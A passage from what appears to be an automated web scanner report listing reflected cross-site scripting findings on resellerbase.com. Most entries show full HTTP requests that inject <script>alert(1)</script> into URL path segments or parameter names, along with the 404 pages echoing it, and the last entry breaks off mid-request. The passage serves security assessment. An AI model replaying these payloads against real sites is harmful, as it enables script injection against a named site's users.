GET /communication/mobile-content/themes/kosmos/imagesc88c3<script>alert(1)</script>05eb52630bc/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesc88c3<script>alert(1)</script>05eb52630bc/rating/ was not found on this server.</p>
...[SNIP]...

2.620. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 595bf<script>alert(1)</script>8546207e525 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating595bf<script>alert(1)</script>8546207e525/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating595bf<script>alert(1)</script>8546207e525/ was not found on this server.</p>
...[SNIP]...

2.621. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ec23<script>alert(1)</script>56ea3d98f37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/?6ec23<script>alert(1)</script>56ea3d98f37=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/?6ec23<script>alert(1)</script>56ea3d98f37=1 was not found on this server.</p>
...[SNIP]...

2.622. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab4db<script>alert(1)</script>199bb651eef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationab4db<script>alert(1)</script>199bb651eef/mobile-content/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationab4db<script>alert(1)</script>199bb651eef/mobile-content/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.623. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6de8<script>alert(1)</script>aabc3f61c23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contente6de8<script>alert(1)</script>aabc3f61c23/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contente6de8<script>alert(1)</script>aabc3f61c23/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.624. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38036<script>alert(1)</script>862e09e44a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes38036<script>alert(1)</script>862e09e44a5/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes38036<script>alert(1)</script>862e09e44a5/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.625. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5d612<script>alert(1)</script>a9471a61056 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos5d612<script>alert(1)</script>a9471a61056/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos5d612<script>alert(1)</script>a9471a61056/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.626. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ecc65<script>alert(1)</script>5c85fd81536 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagesecc65<script>alert(1)</script>5c85fd81536/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesecc65<script>alert(1)</script>5c85fd81536/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.627. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7324c<script>alert(1)</script>43ab631fec3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating7324c<script>alert(1)</script>43ab631fec3/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating7324c<script>alert(1)</script>43ab631fec3/4.gif was not found on this server.</p>
...[SNIP]...

2.628. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d45d6<script>alert(1)</script>3d27a27abe was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/4.gifd45d6<script>alert(1)</script>3d27a27abe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/4.gifd45d6<script>alert(1)</script>3d27a27abe was not found on this server.</p>
...[SNIP]...

2.629. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 301df<script>alert(1)</script>168e251d198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/4.gif?301df<script>alert(1)</script>168e251d198=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/4.gif?301df<script>alert(1)</script>168e251d198=1 was not found on this server.</p>
...[SNIP]...

2.630. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ec0b<script>alert(1)</script>1a179ed5534 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication8ec0b<script>alert(1)</script>1a179ed5534/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication8ec0b<script>alert(1)</script>1a179ed5534/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.631. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b94cc<script>alert(1)</script>1db34878577 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentb94cc<script>alert(1)</script>1db34878577/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentb94cc<script>alert(1)</script>1db34878577/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.632. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f903f<script>alert(1)</script>16d1dfc3878 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesf903f<script>alert(1)</script>16d1dfc3878/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesf903f<script>alert(1)</script>16d1dfc3878/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.633. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8d3da<script>alert(1)</script>4e09a7f2f5e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos8d3da<script>alert(1)</script>4e09a7f2f5e/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos8d3da<script>alert(1)</script>4e09a7f2f5e/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.634. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db877<script>alert(1)</script>f66350c36d4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagesdb877<script>alert(1)</script>f66350c36d4/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesdb877<script>alert(1)</script>f66350c36d4/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.635. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload be981<script>alert(1)</script>32877971aec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/ratingbe981<script>alert(1)</script>32877971aec/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/ratingbe981<script>alert(1)</script>32877971aec/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.636. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c2ede<script>alert(1)</script>c04de8bce3d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.phpc2ede<script>alert(1)</script>c04de8bce3d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.phpc2ede<script>alert(1)</script>c04de8bce3d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.637. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cd7c0<a>7d95444b141 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcd7c0<a>7d95444b141&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
